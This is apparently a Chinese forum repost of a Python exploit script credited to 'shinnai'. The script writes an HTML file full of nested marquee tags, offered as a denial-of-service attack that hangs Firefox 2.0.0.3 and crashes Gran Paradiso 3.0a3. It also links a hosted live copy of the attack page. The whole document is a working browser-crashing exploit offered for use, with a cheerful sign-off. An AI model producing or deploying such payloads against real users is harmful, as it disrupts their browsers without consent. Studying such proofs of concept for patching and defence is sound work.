发新话题
打印

Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit

Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit

复制内容到剪贴板
代码:
#usr/bin/python

print "-------------------------------------------------------------------------"
print " Mozilla Firefox 2.0.0.3 and Gran Paradiso 3.0a3 Denial of Service"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: [url]http://shinnai.altervista.org[/url]\n"
print " For convenience I post up a script in python that create a .html file"
print " You can open it locally, upload and browse it or directely browse here:\n"
print " [url]http://www.shinnai.altervista.org/ff_dos.html[/url]\n"
print " Firefox 2 stops to answer, Gran Paradiso crahses\n"
print " To avoid confusion, this is based on <marquee> idea but it&#39;s not the"
print " same exploit. Take a look here to see differences"
print " [url]http://www.milw0rm.com/exploits/1867[/url]"
print "-------------------------------------------------------------------------"

tagHtml = "<html>"
tagHtmlC = "</html>"
tagHead = "<head>"
tagHeadC = "</head>"
tagTitle = "<title>"
tagTitleC = "</title>"

buff= "<marquee>" * 160

boom = tagHtml + buff + tagHead + tagTitle + tagTitleC + tagHeadC + tagHtmlC

try:
  fileOut = open(&#39;ff_dos.html&#39;,&#39;w&#39;)
  fileOut.write(boom)
  fileOut.close()
  print "\nFILE ff_dos.html CREATED!\n&#39;NJOY IT...\n"
except:
  print "\nUNABLE TO CREATE FILE ff_dos.html!\n"

TOP

发新话题